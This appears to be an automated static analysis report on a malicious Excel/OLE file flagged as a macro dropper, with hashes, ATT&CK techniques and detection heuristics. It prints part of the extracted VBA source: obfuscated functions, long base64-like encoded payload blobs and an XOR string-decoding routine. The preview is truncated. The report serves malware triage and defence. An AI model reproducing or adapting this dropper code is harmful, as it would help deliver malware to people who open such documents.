Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 242e2204916bed88…

MALICIOUS

Office (OLE)

Size: 78.0 KB
Created: 2019-03-05 13:28:55
First seen: 2021-06-13
MD5: 7e4d79738ac8797eda7f723aedaea336
SHA-1: a1cc4b824a35b5e1a016aa9ac0fac0866c66bffc
SHA-256: 242e2204916bed88b609de716c73bbae757efb29dae863e66c5692682d47adc2
Risk Score: 142

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File

The file contains VBA macros that use the Shell() function, a common technique for executing arbitrary commands. The ClamAV detection name 'Doc.Dropper.Agent-6879997-0' strongly suggests it acts as a dropper. The embedded VBA code, though truncated, appears to contain obfuscated data that could be a payload or configuration for a downloader.

Heuristics (4)

  • ClamAV: Doc.Dropper.Agent-6879997-0 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Dropper.Agent-6879997-0
  • VBA macros detected [medium, OLE_VBA_MACROS, 1 related finding]
    Document contains VBA macro code
  • Shell() call in VBA [critical, OLE_VBA_SHELL]
    Shell() call in VBA
  • Suspicious extracted artifact [info, EXTRACTED_FILE_STATIC_TRIAGE]
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 7259 bytes
SHA-256: feac765845016ff32f686ad04b152dc053844042f627cfa0402fdadac6f14d04
Detection: ClamAV: No threats found
Obfuscation or payload: likely (carved artifact contains 6 long base64-like blob(s))

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Function UpdayeLinkss()
UpdayeLinkss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
End Function

Function AddinContns()
AddinContns = ComactD & TestCells & HistoryLog & FalseValue12 & OnResolutionV & ggF
End Function

Function ComactD()
ComactD = "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"
End Function
Function DateAndTime()
DateAndTime = Application.International(xlCountrySetting)
End Function
Function TestCells()
TestCells = "uvBkLovwm4lLg2EExucNQrEsdyffnkWrLac2RjeeovQj1pgMu5c0IoYbDIMZTEYiTbJwg7R4QvkmQ5oSKt1fr6QivV00Foz1Yl7mVHwhurxTGZjupN3bb1QDfXqGJBFIgrAT1xSpYYGZ/u4fhbSfmCukluEWbK8/RHbyjC2sTDgHZ0YIumbJJW3k6XVsHERJ0IscvyBAUBA3mSRDHe8+6FlAzb9k9bXkyAxHKiwWUq4F2iNzcCiTQGXIUolzkCJD3BMdongg5FV0TsRI2MTIS6vLJCGDEr4toSdPVBDZ1o2TyHbrws70lAtBNo/akSWO1mWZs0oLhVg8BhGPU8BvqUWxfQXopzU97O2WxwIYW0QweN9vJWqmrfD0he/+Id+y0XmjfHYp7/E9Pbla5z5lxKRjQNW+x3jfs61vXEXW3YNpxNLx2nGTNIxcejOKOb7ysiPNroiDiWW9PRfv2zNQIhyAHhskeGzPS9kLriovMLqZOpGFg7E1nUiz4bU1mWlHVN1879H7wVdtlTk/NdArVzsxOCJEQsuFLhrPa8XqSvpMpCFAantQjPsEgWq14ZZMw7bMZGUcksDPboP4wewDMQ/V1E7u2/rZ9D8yuKnyg4U2bJLAohjU/JihUXUKTIc2001Ny+VFMRSr2D3kz1nMwNsGLsjT9EITMhFO5UjJOhoxAu1ndNzEZdydRgtItY9PZ8zhjClDOo0E4H9jYtSBNJmZgh8I0RlRJOuvofQmfxui981HdWnfFjwJoOu0QmubNsOTnbTgtHSdtFSPO713p8Diot3a/Apwom8ohuZNqJaS6F2CBbhtSV6aSAA7S2eT1GX+YOtGw4DuA+8FRmVf7F439HecOvLzUNPt78SZFftNAh5G98m1RYomtfGimONliIZSdIg2BGTDfI8cLbE/Azka5/SU/G8VJmswF2hwq09NTqx9TQpaDI6zD+XZaEVMmB99/jZWMADbJPH+w"
End Function
Public Function VersionAccu(ByVal SaveLink As String, ByVal LineToLine As String) As String
Dim a, b, c, d As String
Dim SubLin As Long
Dim SubCom As Long
Dim bb As Long
c = SaveLink
b = LineToLine
a = ""
SubLin = Len(c)
SubCom = Len(b)
For bb = 1 To SubLin Step 3
a = a + Chr(Val(Mid(c, bb, 3)) Xor Asc(Mid(b, (Int(bb / 3) Mod SubCom) + 1, 1)))
Next bb
VersionAccu = a
End Function
Function HistoryLog()
HistoryLog = "quffsEqcMXNhw7ApJaoecdoy3O8eF0D2CA4MkJpKqaumLg77wpyG3pM5Fvna0SBTKblFIOvzXzmk1jMGQDZkaX6iyCne9AQanPrk9gFaeqzmZt/2PhuvPq8dLJBJk5TWDlZ6RYqiRo/YErSGP0oyQWT4jT+nw/kqPhvK+6Go3AS9V5ut5TiRL1GqBNO4biqVeS+KSGCE7NFqzO7nKk6Ur/e7kSNO0IJGW6p/bsd/dc+Ax0uxF1G/6n+5QA13N4p58vweHy9XDHmu3hSfYdRWMpPCTE3DXYeb8vxOeBPqdrtx9RxzPswwUSonczoV4rmjUt5x69zuo5o1yDMRJMMfA/AO
... (truncated)